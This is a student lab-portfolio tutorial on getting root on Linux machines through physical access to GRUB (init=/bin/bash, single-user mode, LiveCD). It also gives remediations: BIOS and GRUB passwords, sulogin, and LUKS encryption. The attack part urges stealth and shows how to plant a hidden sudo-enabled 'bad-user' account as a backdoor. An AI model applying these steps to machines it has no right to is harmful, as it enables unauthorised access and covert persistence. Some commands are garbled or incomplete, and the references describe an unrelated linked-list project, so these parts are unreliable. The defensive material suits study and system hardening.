======Breaking into Linux systems: ======

=====Objectives=====
  * To explore the various methods of breaking into any Linux system without //FDE// (**Full Disk Encryption**) through physical access.
  * To examine the procedure of setting up FDE and other remediations to prevent this.

=====Prerequisites=====
  * Physical access to the target machine
  * ~60 seconds

=====Procedure=====
====Method 1: Using /sbin/init to execute a shell====
[[https://en.wikipedia.org/wiki/Init|Init]] is a process started during bootup that initializes a system. It starts, stops and monitors essential service processes during bootup and shutdown. I will use it to execute a root shell after booting the target system.
  - Power on/reboot the target machine
    - Through a graphical login screen: for a clean reboot just use the shutdown/reboot options in the system menu.
    - Through a Textual User Interface: switch to a text console with <Ctrl>-<Alt>-<Del>.
    - If all else fails, press the Reset button or power cycle the target machine.
  - Press/hold the <Escape> key as soon as you see the GRUB splash screen.
  - At the grub prompt, press 'e' to edit 
  - While still inside grub, add "init=/bin/bash" to the end of the "kernel" line: <code:bash>kernel=/vmlinuz-<version> [...parameters...] init=/bin/bash</code>
  - Continue booting.

DONE! THAT'S ALL FOLKS!\\
After the target machine finishes booting, the kernel will detect the hardware and immediately drop you into a root shell. Since the system initialization script '/etc/rc.d/rc.sysinit' was bypassed and **NOT** executed, 
you need to remount the root file system to make the system more usable:
  - Mount the /proc file system: <code:bash>mount /proc</code> You will see an error message complaining that it was already mounted. Ignore it.
  - Remount the root file system in read-write mode: <code:bash>mount -o remount,rw /</code>
  - Depending on how the target's file system is laid out, you may need to mount some other file systems. Lets view the file system table: <code:bash>cat /etc/fstab</code> Mount any other needed file systems (Like '/home', '/usr', etc.).
  - Do whatever nefarious things you want:
    - **Change the root account password:** <code:bash>passwd root</code>
    - **PROTIP:** I don't recommend doing this. The next time the real user logs into the system they will notice that the root password has been changed and it's **GAME OVER**. We need to be super sneaky, secretive, and surreptitious so here's something a little less noticeable:
      - Simply add another user without modifying the original root password: <code:bash>adduser -D -u 1000 bad-user
passwd bad-user</code>
      - Now add the newly created user to the sudoers file. This is also not as noticable as changing the actual root password: <code:bash>vi /etc/sudoers
bad-user ALL=(ALL) ALL</code>
  - Reboot the target machine to make any changes to the file system persistent.
    - Flush any disk I/O to the hardware: <code:bash>sync</code>
    - Unmount any mounted file systems in reverse order: <code:bash>umount</code>
  - Reboot with either <Ctrl><Alt><Del> or the power switch.
====Method 2: boot to single-user mode====
[[https://en.wikipedia.org/wiki/Single_user_mode|Single user mode]] is a start-up mode that boots a multi-user operating system into single superuser. It is often used for diagnoses and triage of a broken or malware-infected system. After booting into single-user mode, a root shell is provided to the user.
  - Power on/reboot the target machine
    - Through a graphical login screen: for a clean reboot just use the shutdown/reboot options in the system menu.
    - Through a Textual User Interface: switch to a text console with <Ctrl>-<Alt>-<Del>.
    - If all else fails, press the Reset button or power cycle the target machine.
  - Press/hold the <Escape> key as soon as you see the GRUB splash screen.
  - At the grub prompt, press 'a' to modify the kernel parameters.
  - Add a space and the letter 'S' (lower or upper case) to the end of the kernel parameters line:<code:bash>kernel=/vmlinuz-version ro root=LABEL=/ [...other-parameters...] S</code>
    - Sometimes there may still be some mysterious failures in single-user mode, because of **Security-Enhanced Linux policy enforcement**. In that case, add another boot parameter before the 'S':<code:bash>enforcing=0</code>
  - Now press <Enter> to boot with the newly added parameter.
====Method 3: Boot a LiveCD/USB Key/initramfs OS====
===LiveCD===
  - Power off the target machine
    - Through a graphical login screen: for a clean reboot just use the shutdown options in the system menu.
    - Through a Textual User Interface: switch to a text console with <Ctrl>-<Alt>-<Del>.
    - If all else fails, press the Reset button or power cycle the target machine.
  - Press/hold the <Escape> key to enter BIOS/UEFI 
  - Insert any live CD and boot the system.
  - Once it boots, login to the LiveCD OS and get a terminal. Become root with <code:bash>su -</code> and mount the file systems as needed.

=====Remediation Methods=====
====Method 1: BIOS Password====
  - Reboot the system and go into the BIOS. Disable booting from anything other than the main disk.
  - Set a BIOS password. This prevents unauthorized changes to the BIOS settings without a password.
  - Set a BIOS Power On password. Now the machine will require a password before powering on.
====Method 2: GRUB Password====
  - In one terminal, run:<code:bash> # grub-md5-crypt</code> and follow the directions.
  - In another terminal, edit the GRUB configuration file inside the '/boot/grub' named either 'menu.lst' or 'grub.conf'.
  - Add a new line directly below the 'timeout' line:<code:bash>
# ... comments above ...
default=0
timeout=5
password --md5 5f3782baec534bae412c27fc0850fc6d
spashimage=(hd0,0)/grub/splash.xpm.gz
hiddenmenu
......</code>
  - Now Change the file permissions to prevent viewing and recovery of the GRUB password:
  - Now if you needed to legitimately break into your own machine, you need to press P while inside GRUB to enter the password to edit the boot parameters.
====Method 3: single-user mode sulogin====
  - Find where your system has its program sulogin with this command:
<code:bash># which sulogin</code>
  - This will force users to enter the root password to get a shell when booting into single-user mode. This is done by requiring sulogin to get into single-user mode. 
    - To have the system boot up to its default run state (with the login prompt) type <Ctrl-D>
  - This remedy depends on what is running; traditional init, Upstart or systemd
  - Look at your file a/etc/inittaba and see if it contains a line specifying the sysinit action.
    - If that file contains a line similar to: <code:bash>si::sysinit:/etc/rc.d/rc.sysinit</code> then you have traditional init.
    - In this case, leave that line alone and add a new line:<code:bash># System initialization
si::sysinit:/etc/rc.d/rc.sysinit
ss:S:respawn:/sbin/sulogin	# added line</code>
    - If that file is mostly comments with just one line specifying initdefault or even missing, and you have a directory /etc/init, then you have Upstart for init. In this case:
      - If /etc/sysconfig/init exists, modify '/etc/sysconfig/init' and change: <code:bash>SINGLE=/sbin/sushell</code> to this: <code:bash>SINGLE=/sbin/sulogin</code>
      - If there is no '/etc/sysconfig/init', this file (located in /etc/init/rcS.conf) prevents the booting to single-user mode:<code:bash>start on runlevel S
stop on runlevel [!S]

console owner
script
    if [ -x /usr/share/recovery-mode/recovery-menu ]; then
        exec /usr/share/recovery-mode/recovery-menu
    else
        exec /sbin/sulogin
    fi
end script

[...]</code>
=====Full Disk Encryption====
====Loop Device====
A small file named **//crypt//** will be created and used to store cryptographic keys needed for booting, hdd encryption, ssh, etc.
<code:bash># create empty file 'crypt'
dd if=/dev/zero of=/crypt bs=1M count=256
# create device node
losetup /dev/loop0 /crypt
# setup LUKS header
cryptsetup -c aes-xts-plain64 --key-size 512 \
	--hash sha512 --iter-time 5000 \
	--use-urandom luksFormat /dev/loop0
# open file
cryptsetup open /dev/loop0 crypt
# create filesystem
mkfs.ext4 /dev/mapper/crypt
# create mountpoint
mkdir /mnt/crypt
# mount file
mount -t ext4 /dev/mapper/crypt /mnt/crypt

...

# unmount file
umount /mnt/crypt
# delete mountpoint
rmdir /mnt/crypt
# close file
cryptsetup close crypt
# delete device node
losetup -d /dev/loop0</code>
====Entire Partition====
**Note:** /dev/sdb1 will be used as the test partition, 'private' will be its name.
<code:bash># Create partition 
cryptsetup -c aes-xts-plain64 \
	--key-size 512 --hash sha512 \
	--iter-time 5000 --use-urandom /dev/sdb1
# open volume onto device mapper
cryptsetup open /dev/sdb1 private
# create filesystem
mkfs.ext4 /dev/mapper/private
# open mapped device
cryptsetup --type luks open /dev/sdb1 private
# mount encrypted partition
mount -t ext4 /dev/mapper/private /mnt/private

...

# unmount
umount /dev/sdb1
# close mapped device
cryptsetup close private</code>

=====References=====
In performing this project, the following resources were referenced:

  * **Google**: Of course Google was used, it knows everything. No particular page from Google was used, It was mainly used for information about the project (Linked Lists in general): http://www.google.com/; If ya don't know, now ya know, and knowing is half the battle.

  * **Wikipedia**: Has a great article on Linked Lists; Tons of information, pretty pictures, and some code: http://en.wikipedia.org/wiki/Linked_list.

[[http://lab46.corning-cc.edu/user/nbrimme1/portfolio|Back to my Portfolio]]